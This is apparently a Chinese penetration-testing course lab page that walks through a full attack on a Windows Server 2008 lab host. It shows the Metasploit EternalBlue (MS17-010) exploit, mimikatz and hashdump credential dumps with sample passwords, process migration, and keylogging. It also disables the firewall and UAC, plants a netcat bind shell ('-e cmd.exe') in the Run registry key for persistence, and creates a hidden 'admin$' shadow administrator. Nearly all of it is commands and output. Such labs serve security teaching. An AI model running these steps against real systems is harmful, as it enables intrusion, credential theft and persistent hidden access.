03： Windows漏洞综合利用、MetaPreter进程迁移、键盘记录、持久性后门程序植入、影子用户、操作日志清理 - CASE - 《网络运维与安全》

1 MS17-010 漏洞利用
- 1.1 问题
- 1.2 步骤
2 持久性后门程序植入
- 2.1 问题
- 2.2 步骤
3 Windows 影子用户
- 3.1 问题
- 3.2 步骤

Top

MS17-010 漏洞利用
持久性后门程序植入
Windows 影子用户

1 MS17-010 漏洞利用

1.1 问题

1）查找 MS17-010 漏洞利用脚本

2）利用漏洞攻击 Win2008 Server

加载 kiwi 模块获取系统密码
利用 hashdump 获取密文，访问解密网站进行解密
将渗透进程迁移到 explorer.exe，防止退出
通过键盘记录获取目标主机的键盘输入
修改防火墙配置开放 TCP 444 端口
关闭系统 UAC

1.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：查找 MS17-010 漏洞利用脚本.

1）查找 MS17-010 漏洞利用脚本


1.  msf6 > search ms17-010
3.  Matching Modules
4.  ================
6.     #  Name                                           Disclosure Date  Rank     Check  Description
7.     -  \-\-\-\-                                           \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-     \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
8.     0  auxiliary/admin/smb/ms17\_010\_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
9.     1  auxiliary/scanner/smb/smb\_ms17\_010                              normal   No     MS17-010 SMB RCE Detection
10.     2  exploit/windows/smb/ms17\_010\_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

2）使用扫描脚本进行漏洞扫描


1.  msf6 > use 1
2.  msf6 auxiliary(scanner/smb/smb\_ms17\_010) > set rhosts 192.168.10.145 
3.  rhosts => 192.168.10.145
4.  msf6 auxiliary(scanner/smb/smb\_ms17\_010) > run
6.  \[+\] 192.168.10.145:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
7.  \[*\] 192.168.10.145:445    - Scanned 1 of 1 hosts (100% complete)
8.  \[*\] Auxiliary module execution completed

步骤二：查找 MS17-010 漏洞利用脚本

1）使用漏洞利用脚本进行渗透


1.  msf6 auxiliary(scanner/smb/smb\_ms17\_010) > back
2.  msf6 > use 2
3.  \[*\] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
4.  msf6 exploit(windows/smb/ms17\_010\_eternalblue) > set rhosts 192.168.10.145
5.  rhosts => 192.168.10.145
6.  msf6 exploit(windows/smb/ms17\_010\_eternalblue) > run
8.  \[*\] Started reverse TCP handler on 192.168.10.136:4444 
9.  \[*\] 192.168.10.145:445 - Executing automatic check (disable AutoCheck to override)
10.  \[*\] 192.168.10.145:445 - Using auxiliary/scanner/smb/smb\_ms17\_010 as check
11.  \[+\] 192.168.10.145:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
12.  \[*\] 192.168.10.145:445    - Scanned 1 of 1 hosts (100% complete)
13.  \[+\] 192.168.10.145:445 - The target is vulnerable.
14.  \[*\] 192.168.10.145:445 - Using auxiliary/scanner/smb/smb\_ms17\_010 as check
15.  \[+\] 192.168.10.145:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
16.  \[*\] 192.168.10.145:445    - Scanned 1 of 1 hosts (100% complete)
17.  \[*\] 192.168.10.145:445 - Connecting to target for exploitation.
18.  \[+\] 192.168.10.145:445 - Connection established for exploitation.
19.  \[+\] 192.168.10.145:445 - Target OS selected valid for OS indicated by SMB reply
20.  \[*\] 192.168.10.145:445 - CORE raw buffer dump (51 bytes)
21.  \[*\] 192.168.10.145:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
22.  \[*\] 192.168.10.145:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
23.  \[*\] 192.168.10.145:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
24.  \[*\] 192.168.10.145:445 - 0x00000030  6b 20 31                                         k 1             
25.  \[+\] 192.168.10.145:445 - Target arch selected valid for arch indicated by DCE/RPC reply
26.  \[*\] 192.168.10.145:445 - Trying exploit with 12 Groom Allocations.
27.  \[*\] 192.168.10.145:445 - Sending all but last fragment of exploit packet
28.  \[*\] 192.168.10.145:445 - Starting non-paged pool grooming
29.  \[+\] 192.168.10.145:445 - Sending SMBv2 buffers
30.  \[+\] 192.168.10.145:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
31.  \[*\] 192.168.10.145:445 - Sending final SMBv2 buffers.
32.  \[*\] 192.168.10.145:445 - Sending last fragment of exploit packet!
33.  \[*\] 192.168.10.145:445 - Receiving response from exploit packet
34.  \[+\] 192.168.10.145:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
35.  \[*\] 192.168.10.145:445 - Sending egg to corrupted connection.
36.  \[*\] 192.168.10.145:445 - Triggering free of corrupted buffer.
37.  \[*\] Sending stage (200262 bytes) to 192.168.10.145
38.  \[*\] Meterpreter session 2 opened (192.168.10.136:4444 -> 192.168.10.145:49489) at 2021-03-22 14:51:44 +0800
39.  \[+\] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
40.  \[+\] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
41.  \[+\] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
43.  meterpreter >

2）加载 kiwi 模块获取用户信息


1.  meterpreter > load kiwi
2.  Loading extension kiwi...
3.    .#####.   mimikatz 2.2.0 20191125 (x64/windows)
4.   .\## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
5.   ## / \ ##  /\*\*\* Benjamin DELPY \`gentilkiwi\` ( benjamin@gentilkiwi.com )
6.   ## \ / ##       \> http://blog.gentilkiwi.com/mimikatz
7.   '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
8.    '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
10.  Success.
11.  meterpreter > help kiwi
13.  Kiwi Commands
14.  =============
16.      Command                Description
17.      \-\-\-\-\-\-\-                \-\-\-\-\-\-\-\-\-\-\-
18.      creds_all              Retrieve all credentials (parsed)
19.      creds_kerberos         Retrieve Kerberos creds (parsed)
20.      creds_livessp          Retrieve Live SSP creds
21.      creds_msv              Retrieve LM/NTLM creds (parsed)
22.      creds_ssp              Retrieve SSP creds
23.      creds_tspkg            Retrieve TsPkg creds (parsed)
24.      creds_wdigest          Retrieve WDigest creds (parsed)
25.      dcsync                 Retrieve user account information via DCSync (unparsed)
26.      dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
27.      golden\_ticket\_create   Create a golden kerberos ticket
28.      kerberos\_ticket\_list   List all kerberos tickets (unparsed)
29.      kerberos\_ticket\_purge  Purge any in-use kerberos tickets
30.      kerberos\_ticket\_use    Use a kerberos ticket
31.      kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
32.      lsa\_dump\_sam           Dump LSA SAM (unparsed)
33.      lsa\_dump\_secrets       Dump LSA secrets (unparsed)
34.      password_change        Change the password/hash of a user
35.      wifi_list              List wifi profiles/creds for the current user
36.      wifi\_list\_shared       List shared wifi profiles/creds (requires SYSTEM)
37.  meterpreter > creds_all 
38.  \[+\] Running as SYSTEM
39.  \[*\] Retrieving all credentials
40.  msv credentials
41.  ===============
43.  Username       Domain          LM                                NTLM                              SHA1
44.  \-\-\-\-\-\-\-\-       \-\-\-\-\-\-          --                                \-\-\-\-                              \-\-\-\-
45.  Administrator  VAGRANT-2008R2  5229b7f52540641daad3b435b51404ee  e02bc503339d51f71d913c245d35b50b  c805f88436bcd9ff534ee86c59ed230437505ecf
46.  sshd_server    VAGRANT-2008R2  e501ddc244ad2c14829b15382fe04c64  8d0a16cfc061c3359db455d00ec27035  94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
48.  wdigest credentials
49.  ===================
51.  Username         Domain          Password
52.  \-\-\-\-\-\-\-\-         \-\-\-\-\-\-          \-\-\-\-\-\-\-\-
53.  (null)           (null)          (null)
54.  Administrator    VAGRANT-2008R2  vagrant
55.  VAGRANT-2008R2$  WORKGROUP       (null)
56.  sshd_server      VAGRANT-2008R2  D@rj33l1ng

3）使用 hashdump 获取账户信息


1.  meterpreter > hashdump 
2.  Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
3.  anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
4.  artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
5.  ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
6.  boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
7.  chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
8.  c\_three\_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
9.  darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
10.  greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
11.  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12.  han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
13.  jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
14.  jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
15.  kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::
16.  lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
17.  leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
18.  luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
19.  sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
20.  sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
21.  vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

4）进程迁移


1.  meterpreter > getuid 
2.  Server username: NT AUTHORITY\SYSTEM
4.  meterpreter > help ps
5.  Usage: ps \[ options \] pattern
7.  Use the command with no arguments to see all running processes.
8.  The following options can be used to filter those results:
10.  OPTIONS:
12.      -A <opt>  Filter on architecture
13.      -S <opt>  Filter on process name
14.      -U <opt>  Filter on user name
15.      -c        Filter only child processes of the current shell
16.      -h        Help menu.
17.      -s        Filter only SYSTEM processes
18.      -x        Filter for exact matches rather than regex
20.  meterpreter > ps -S explorer
21.  Filtering on 'explorer'
23.  Process List
24.  ============
26.   PID   PPID  Name          Arch  Session  User                          Path
27.   \-\-\-   \-\-\-\-  \-\-\-\-          \-\-\-\-  \-\-\-\-\-\-\-  \-\-\-\-                          \-\-\-\-
28.   1648  4584  explorer.exe  x64   1        VAGRANT-2008R2\Administrator  C:\Windows\Explorer.EXE
30.  meterpreter > migrate 1648
31.  \[*\] Migrating from 1052 to 1648...
32.  \[*\] Migration completed successfully.
34.  meterpreter > getuid 
35.  Server username: VAGRANT-2008R2\Administrator

5）通过键盘记录获取目标主机的键盘输入


1.  meterpreter > run post/windows/capture/keylog_recorder
3.  \[*\] Executing module against VAGRANT-2008R2
4.  \[*\] Starting the keylog recorder...
5.  \[*\] Keystrokes being saved in to /root/.msf4/loot/20210322151611\_default\_192.168.10.145_host.windows.key_287595.txt
6.  \[*\] Recording keystrokes...
7.  ^C\[*\] User interrupt.
8.  \[*\] Shutting down keylog recorder. Please wait...

Win2008 键盘上输入

CASE - 图1

图 - 13

Kali 后台获取到的输入内容。


1.  ┌──(root💀localhost)-\[~/桌面\]
2.  └─# cat /root/.msf4/loot/20210322151611\_default\_192.168.10.145_host.windows.key_287595.txt
3.  Keystroke log from explorer.exe on VAGRANT-2008R2 with user VAGRANT-2008R2\Administrator started at 2021-03-22 15:16:11 +0800
5.  hello
6.   world<CR>
7.  welcome
8.  <^S>
10.  Keylog Recorder exited at 2021-03-22 15:16:29 +0800

6）关闭防火墙、添加防火墙规则


1.  meterpreter > shell
2.  Process 3276 created.
3.  Channel 1 created.
4.  Microsoft Windows \[Version 6.1.7601\]
5.  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
7.  C:\Windows\system32>netsh adcfirewall set allprofiles state off
8.  netsh adcfirewall set allprofiles state off
9.  The following command was not found: adcfirewall set allprofiles state off.
11.  C:\Windows\system32>netsh firewall add portopening TCP 444 backdoor ENABLE ALL
12.  netsh firewall add portopening TCP 444 backdoor ENABLE ALL
14.  IMPORTANT: Command executed successfully.
15.  However, "netsh firewall" is deprecated;
16.  use "netsh advfirewall firewall" instead.
17.  For more information on using "netsh advfirewall firewall" commands
18.  instead of "netsh firewall", see KB article 947709
19.  at http://go.microsoft.com/fwlink/?linkid=121488 .
21.  Ok.

检查防火墙规则已经添加。

CASE - 图2

规则属性。

图 - 14

CASE - 图3

防火墙规则：协议及端口。

图 - 15

CASE - 图4

图 - 16

7）关闭用户账户控制


1.  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v   EnableLUA /t     REG_DWORD /d    0  /f

CASE - 图5

图 - 17

2 持久性后门程序植入

2.1 问题

持久性后门程序植入。

上传后门文件
查看注册表开机启动的进程
将 nc.exe 添加到口开机启动监听 TCP 444 端口
使用 nc 连接后门

2.2 步骤

实现此案例需要按照如下步骤进行。

步骤一: 持久性后门程序植入

1）上传后门文件


1.  C:\Windows\system32>exit    
2.  exit
3.  meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\\windows\\\system32
4.  \[*\] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
5.  \[*\] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe

2）查看注册表开机启动的进程


1.  meterpreter > reg enumkey -k HKLM\\\software\\\microsoft\\\windows\\\currentversion\\\run
2.  Enumerating: HKLM\software\microsoft\windows\currentversion\run
3.    Values (2):
4.          VMware VM3DService Process
5.          VMware User Process

3）将 nc.exe 添加到口开机启动监听 TCP 444 端口


1.  meterpreter > reg setval -k HKLM\\\software\\\microsoft\\\windows\\\currentversion\\\run -v nc -d C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
2.  Successfully set nc of REG_SZ.
3.  meterpreter > reg enumkey -k HKLM\\\software\\\microsoft\\\windows\\\currentversion\\\run
4.  Enumerating: HKLM\software\microsoft\windows\currentversion\run
6.    Values (3):
8.          VMware VM3DService Process
9.          VMware User Process
10.          nc

CASE - 图6

图 - 18

4）使用 nc 连接后门


1.  ┌──(root💀localhost)-\[~/桌面\]
2.  └─# nc  192.168.10.145 444                                                                                  
3.  Microsoft Windows \[Version 6.1.7601\]
4.  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
6.  C:\Windows\system32>ipconfig
7.  ipconfig
9.  Windows IP Configuration
12.  Ethernet adapter Local Area Connection:
14.     Connection-specific DNS Suffix  . : 
15.     Link-local IPv6 Address . . . . . : fe80::4811:f528:60a8:63e3%11
16.     IPv4 Address. . . . . . . . . . . : 192.168.10.145
17.     Subnet Mask . . . . . . . . . . . : 255.255.255.0
18.     Default Gateway . . . . . . . . . : 192.168.10.2

3 Windows 影子用户

3.1 问题

1）为 Win2008 添加普通用户

查看系统当前用户
创建后门用户以 “$” 结尾，赋予管理员权限

2）复制 administrator 身份信息

修改注册表允许访问注册表 “SAM”
复制 administrator 身份到 admin$ 用户
将 admin$ 用户注册表导出到文件

3）创建影子用户并验证

删除 admin$ 用户
将注册表文件导入

3.2 步骤

实现此案例需要按照如下步骤进行。

步骤一: Windows 影子用户

1）查看系统当前用户


1.  meterpreter > shell
2.  Process 1404 created.
3.  Channel 1 created.
4.  Microsoft Windows \[Version 6.1.7601\]
5.  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
7.  C:\Windows\system32>net user
8.  net user
10.  User accounts for \\\
12.  \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-
13.  Administrator            anakin\_skywalker         artoo\_detoo              
14.  ben\_kenobi               boba\_fett                c\_three\_pio              
15.  chewbacca                darth_vader              greedo                   
16.  Guest                    han\_solo                 jabba\_hutt               
17.  jarjar\_binks             kylo\_ren                 lando_calrissian         
18.  leia\_organa              luke\_skywalker           sshd                     
19.  sshd_server              vagrant                  
20.  The command completed with one or more errors.

2）创建后门用户以 “$” 结尾，赋予管理员权限


1.  C:\Windows\system32>net  user  admin$ 123456  /add
2.  net  user  admin$ 123456  /add
3.  The command completed successfully.
6.  C:\Windows\system32>net localgroup administrators admin$ /add
7.  net localgroup administrators admin$ /add
8.  The command completed successfully.

步骤二: 复制 administrator 身份信息

1）修改注册表允许访问注册表 “SAM”


1.  ┌──(root💀localhost)-\[~/桌面\]
2.  └─# rdesktop -u administrator -p vagrant 192.168.10.145

CASE - 图7

图 - 19

2）点击 “Permissions” 修改权限

图 - 20

3）为 administrators 增加 “Full control” 权限

CASE - 图8

图 - 21

4）重新打开注册表，找到 user

CASE - 图9

图 - 22

5）找到 000001F4(administrator) ，打开 “F” 复制内容

CASE - 图10

图 - 23

6）打开 “000003FB” ，打开 F 粘贴

CASE - 图11

图 - 24

7）将注册表信息导出

CASE - 图12

图 - 25

CASE - 图13

图 - 26

CASE - 图14

图 - 27

步骤三：创建影子用户并验证

1）删除用户 admin$

CASE - 图15

图 - 28

2）将注册表文件导入

CASE - 图16

图 - 29

用户目录下不显示 admin$

CASE - 图17

图 - 30

网络用户不显示

CASE - 图18

图 - 31

用户管理不显示

CASE - 图19

图 - 32
https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY03/CASE/01/index.html